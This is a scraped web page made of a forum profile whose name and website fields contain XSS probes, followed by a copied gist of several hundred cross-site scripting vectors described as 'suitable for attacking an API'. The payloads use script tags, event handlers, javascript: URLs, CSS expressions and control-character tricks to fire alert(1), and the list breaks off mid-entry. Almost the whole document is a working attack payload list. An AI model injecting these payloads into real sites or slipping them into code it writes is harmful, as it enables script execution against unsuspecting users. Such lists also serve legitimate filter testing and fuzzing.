mahitman

/<svg/onload=prompt(1)>''

Personal Data

Member since
8 years ago
Real Name
/<svg/onload=prompt(1)>''
Website
http://javascript:alert(1).com/  
GameDev Abilities

All Gists JohannesHoppe / 666_lines_of_XSS_vectors.html Created on May 20, 2013 Code Revisions 1 Embed URL HTT

About

All Gists

JohannesHoppe / 666_lines_of_XSS_vectors.html Created on May 20, 2013

Code
Revisions 1

Embed URL

HTTPS clone URL

You can clone with HTTPS or SSH.

666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L

666_lines_of_XSS_vectors.html

<script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> '&#34;&gt;&lt;\x3Cscript&gt;javascript:alert(1)&lt;/script&gt; &#39;"><\x00script>javascript:alert(1)</script> <img src=1 href=1 onerror="javascript:alert(1)"></img> <audio src=1 href=1 onerror="javascript:alert(1)"></audio> <video src=1 href=1 onerror="javascript:alert(1)"></video> <body src=1 href=1 onerror="javascript:alert(1)"></body> <image src=1 href=1 onerror="javascript:alert(1)"></image> <object src=1 href=1 onerror="javascript:alert(1)"></object> <script src=1 href=1 onerror="javascript:alert(1)"></script> <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> <applet onError applet onError="javascript:javascript:alert(1)"></applet onError> <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> <body onResize body onResize="javascript:javascript:alert(1)"></body onResize> <object onError object onError="javascript:javascript:alert(1)"></object onError> <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> <body onunload body onunload="javascript:javascript:alert(1)"></body onunload> <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> <body onload body onload="javascript:javascript:alert(1)"></body onload> <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> <iframe src iframe src="javascript:javascript:alert(1)"></iframe src> <svg onload svg onload="javascript:javascript:alert(1)"></svg onload> <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> <body onblur body onblur="javascript:javascript:alert(1)"></body onblur> \x3Cscript>javascript:alert(1)</script> '"&gt;&lt;script&gt;/* *\x2Fjavascript:alert(1)// */&lt;/script&gt; &lt;script&gt;javascript:alert(1)&lt;/script\x0D &lt;script&gt;javascript:alert(1)&lt;/script\x0A &lt;script&gt;javascript:alert(1)&lt;/script\x0B &lt;script charset=&#34;\x22&gt;javascript:alert(1)&lt;/script&gt; &lt;!--\x3E&lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt; --&gt;&lt;!-- ---&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt; --&gt;&lt;!-- --\x00&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt; --&gt;&lt;!-- --\x21&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt; --&gt;&lt;!-- --\x3E&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;"'><img src='#\x27 onerror=javascript:alert(1)> <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> "'&gt;&lt;p&gt;&lt;svg&gt;&lt;script&gt;a=&#39;hello\x27;javascript:alert(1)//&#39;;&lt;/script&gt;&lt;/p&gt; &lt;a href=&#34;javas\x00cript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x07cript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x0Dcript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x0Acript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x08cript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x02cript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x03cript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x04cript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x01cript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x05cript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x0Bcript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x09cript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x06cript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javas\x0Ccript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;script&gt;/* *\x2A/javascript:alert(1)// */&lt;/script&gt; &lt;script&gt;/* *\x00/javascript:alert(1)// */&lt;/script&gt; &lt;style&gt;&lt;/style\x3E&lt;img src=&#34;about:blank&#34; onerror=javascript:alert(1)//&gt;&lt;/style&gt; &lt;style&gt;&lt;/style\x0D&lt;img src=&#34;about:blank&#34; onerror=javascript:alert(1)//&gt;&lt;/style&gt; &lt;style&gt;&lt;/style\x09&lt;img src=&#34;about:blank&#34; onerror=javascript:alert(1)//&gt;&lt;/style&gt; &lt;style&gt;&lt;/style\x20&lt;img src=&#34;about:blank&#34; onerror=javascript:alert(1)//&gt;&lt;/style&gt; &lt;style&gt;&lt;/style\x0A&lt;img src=&#34;about:blank&#34; onerror=javascript:alert(1)//&gt;&lt;/style&gt; &#34;&#39;>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/';">DEF "'&gt;ABC&lt;div style=&#34;font-family:&#39;foo&#39;\x3Bx:expression(javascript:alert(1);/*&#39;;&#34;&gt;DEF &lt;script&gt;if(&#34;x\\xE1\x96\x89&#34;.length==2) { javascript:alert(1);}&lt;/script&gt; &lt;script&gt;if(&#34;x\\xE0\xB9\x92&#34;.length==2) { javascript:alert(1);}&lt;/script&gt; &lt;script&gt;if(&#34;x\\xEE\xA9\x93&#34;.length==2) { javascript:alert(1);}&lt;/script&gt; &#39;"><\x3Cscript>javascript:alert(1)</script> '&#34;&gt;&lt;\x00script&gt;javascript:alert(1)&lt;/script&gt; &#34;&#39;><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'&gt;&lt;\x00img src=xxx:x onerror=javascript:alert(1)&gt; &lt;script src=&#34;data:text/plain\x2Cjavascript:alert(1)&#34;&gt;&lt;/script&gt; &lt;script src=&#34;data:\xD4\x8F,javascript:alert(1)&#34;&gt;&lt;/script&gt; &lt;script src=&#34;data:\xE0\xA4\x98,javascript:alert(1)&#34;&gt;&lt;/script&gt; &lt;script src=&#34;data:\xCB\x8F,javascript:alert(1)&#34;&gt;&lt;/script&gt; &lt;script\x20type=&#34;text/javascript&#34;&gt;javascript:alert(1);&lt;/script&gt; &lt;script\x3Etype=&#34;text/javascript&#34;&gt;javascript:alert(1);&lt;/script&gt; &lt;script\x0Dtype=&#34;text/javascript&#34;&gt;javascript:alert(1);&lt;/script&gt; &lt;script\x09type=&#34;text/javascript&#34;&gt;javascript:alert(1);&lt;/script&gt; &lt;script\x0Ctype=&#34;text/javascript&#34;&gt;javascript:alert(1);&lt;/script&gt; &lt;script\x2Ftype=&#34;text/javascript&#34;&gt;javascript:alert(1);&lt;/script&gt; &lt;script\x0Atype=&#34;text/javascript&#34;&gt;javascript:alert(1);&lt;/script&gt; ABC&lt;div style=&#34;x\x3Aexpression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:expression\x5C(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:expression\x00(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:exp\x00ression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:exp\x5Cression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\x0Aexpression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\x09expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE3\x80\x80expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE2\x80\x84expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xC2\xA0expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE2\x80\x80expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE2\x80\x8Aexpression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\x0Dexpression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\x0Cexpression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE2\x80\x87expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xEF\xBB\xBFexpression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\x20expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE2\x80\x88expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\x00expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE2\x80\x8Bexpression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE2\x80\x86expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE2\x80\x85expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE2\x80\x82expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\x0Bexpression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE2\x80\x81expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE2\x80\x83expression(javascript:alert(1)&#34;&gt;DEF ABC&lt;div style=&#34;x:\xE2\x80\x89expression(javascript:alert(1)&#34;&gt;DEF &lt;a href=&#34;\x0Bjavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x0Fjavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xC2\xA0javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x05javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE1\xA0\x8Ejavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x18javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x11javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\x88javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\x89javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\x80javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x17javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x03javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x0Ejavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x1Ajavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x00javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x10javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\x82javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x20javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x13javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x09javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\x8Ajavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x14javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x19javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\xAFjavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x1Fjavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\x81javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x1Djavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\x87javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x07javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE1\x9A\x80javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\x83javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x04javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x01javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x08javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\x84javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\x86javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE3\x80\x80javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x12javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x0Djavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x0Ajavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x0Cjavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x15javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\xA8javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x16javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x02javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x1Bjavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x06javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\xA9javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x80\x85javascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x1Ejavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\xE2\x81\x9Fjavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;\x1Cjavascript:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javascript\x00:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javascript\x3A:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javascript\x09:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javascript\x0D:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt; &lt;a href=&#34;javascript\x0A:javascript:alert(1)&#34; id=&#34;fuzzelement1&#34;&gt;test&lt;/a&gt;"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> &#34;&#39;&gt;&lt;img src=xxx:x \x22onerror=javascript:alert(1)&gt;"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> &#34;&#39;&gt;&lt;img src=xxx:x \x0Donerror=javascript:alert(1)&gt;"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> &#34;&#39;&gt;&lt;img src=xxx:x \x09onerror=javascript:alert(1)&gt;"'><img src=xxx:x \x0Conerror=javascript:alert(1)> &#34;&#39;&gt;&lt;img src=xxx:x \x00onerror=javascript:alert(1)&gt;"'><img src=xxx:x \x27onerror=javascript:alert(1)> &#34;&#39;&gt;&lt;img src=xxx:x \x20onerror=javascript:alert(1)&gt; &#34;'><script>\x3Bjavascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\x0Djavascript:alert(1)&lt;/script&gt; &#34;'><script>\xEF\xBB\xBFjavascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(1)&lt;/script&gt; &#34;'><script>\xE2\x80\x84javascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(1)&lt;/script&gt; &#34;'><script>\x09javascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(1)&lt;/script&gt; &#34;'><script>\xE2\x80\x85javascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(1)&lt;/script&gt; &#34;'><script>\x00javascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(1)&lt;/script&gt; &#34;'><script>\xE2\x80\x8Ajavascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(1)&lt;/script&gt; &#34;'><script>\x0Cjavascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\x2Bjavascript:alert(1)&lt;/script&gt; &#34;'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> "&#39;&gt;&lt;script&gt;-javascript:alert(1)&lt;/script&gt; &#34;'><script>\x0Ajavascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(1)&lt;/script&gt; &#34;'><script>\x7Ejavascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(1)&lt;/script&gt; &#34;'><script>\xE2\x81\x9Fjavascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(1)&lt;/script&gt; &#34;'><script>\xC2\x85javascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(1)&lt;/script&gt; &#34;'><script>\xE2\x80\x83javascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(1)&lt;/script&gt; &#34;'><script>\xEF\xBF\xBEjavascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(1)&lt;/script&gt; &#34;'><script>\x21javascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(1)&lt;/script&gt; &#34;'><script>\xE2\x80\x86javascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(1)&lt;/script&gt; &#34;'><script>\x0Bjavascript:alert(1)</script> "&#39;&gt;&lt;script&gt;\x20javascript:alert(1)&lt;/script&gt; &#34;'><script>\xC2\xA0javascript:alert(1)</script> "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> <script\x2F>javascript:alert(1)</script> <script\x20>javascript:alert(1)</script> <script\x0D>javascript:alert(1)</script> <script\x0A>javascript:alert(1)</script> <script\x0C>javascript:alert(1)</script> <script\x00>javascript:alert(1)</script> <script\x09>javascript:alert(1)</script> &#34;&#39;&gt;&lt;img src=xxx:x onerror\x0B=javascript:alert(1)&gt;"'><img src=xxx:x onerror\x00=javascript:alert(1)> &#34;&#39;&gt;&lt;img src=xxx:x onerror\x0C=javascript:alert(1)&gt;"'><img src=xxx:x onerror\x0D=javascript:alert(1)> &#34;&#39;&gt;&lt;img src=xxx:x onerror\x20=javascript:alert(1)&gt;"'><img src=xxx:x onerror\x0A=javascript:alert(1)> &#34;&#39;&gt;&lt;img src=xxx:x onerror\x09=javascript:alert(1)&gt; &lt;script&gt;javascript:alert(1)&lt;\x00/script&gt; &lt;img src=# onerror\x3D&#34;javascript:alert(1)&#34; &gt; &lt;input onfocus=javascript:alert(1) autofocus&gt; &lt;input onblur=javascript:alert(1) autofocus&gt;&lt;input autofocus&gt; &lt;video poster=javascript:javascript:alert(1)// &lt;body onscroll=javascript:alert(1)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt; &lt;form id=test onforminput=javascript:alert(1)&gt;&lt;input&gt;&lt;/form&gt;&lt;button form=test onformchange=javascript:alert(1)&gt;X &lt;video&gt;&lt;source onerror=&#34;javascript:javascript:alert(1)&#34;&gt; &lt;video onerror=&#34;javascript:javascript:alert(1)&#34;&gt;&lt;source&gt; &lt;form&gt;&lt;button formaction=&#34;javascript:javascript:alert(1)&#34;&gt;X &lt;body oninput=javascript:alert(1)&gt;&lt;input autofocus&gt; &lt;math href=&#34;javascript:javascript:alert(1)&#34;&gt;CLICKME&lt;/math&gt; &lt;math&gt; &lt;maction actiontype=&#34;statusline#http://google.com&#34; xlink:href=&#34;javascript:javascript:alert(1)&#34;&gt;CLICKME&lt;/maction&gt; &lt;/math&gt; &lt;frameset onload=javascript:alert(1)&gt; &lt;table background=&#34;javascript:javascript:alert(1)&#34;&gt; &lt;!--&lt;img src=&#34;--&gt;&lt;img src=x onerror=javascript:alert(1)//&#34;&gt; &lt;comment&gt;&lt;img src=&#34;&lt;/comment&gt;&lt;img src=x onerror=javascript:alert(1))//&#34;&gt; &lt;![&gt;&lt;img src=&#34;]&gt;&lt;img src=x onerror=javascript:alert(1)//&#34;&gt; &lt;style&gt;&lt;img src=&#34;&lt;/style&gt;&lt;img src=x onerror=javascript:alert(1)//&#34;&gt; &lt;li style=list-style:url() onerror=javascript:alert(1)&gt; &lt;div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)&gt;&lt;/div&gt; &lt;head&gt;&lt;base href=&#34;javascript://&#34;&gt;&lt;/head&gt;&lt;body&gt;&lt;a href=&#34;/. /,javascript:alert(1)//#&#34;&gt;XXX&lt;/a&gt;&lt;/body&gt; &lt;SCRIPT FOR=document EVENT=onreadystatechange&gt;javascript:alert(1)&lt;/SCRIPT&gt; &lt;OBJECT CLASSID=&#34;clsid:333C7BC4-460F-11D0-BC04-0080C7055A83&#34;&gt;&lt;PARAM NAME=&#34;DataURL&#34; VALUE=&#34;javascript:alert(1)&#34;&gt;&lt;/OBJECT&gt; &lt;object 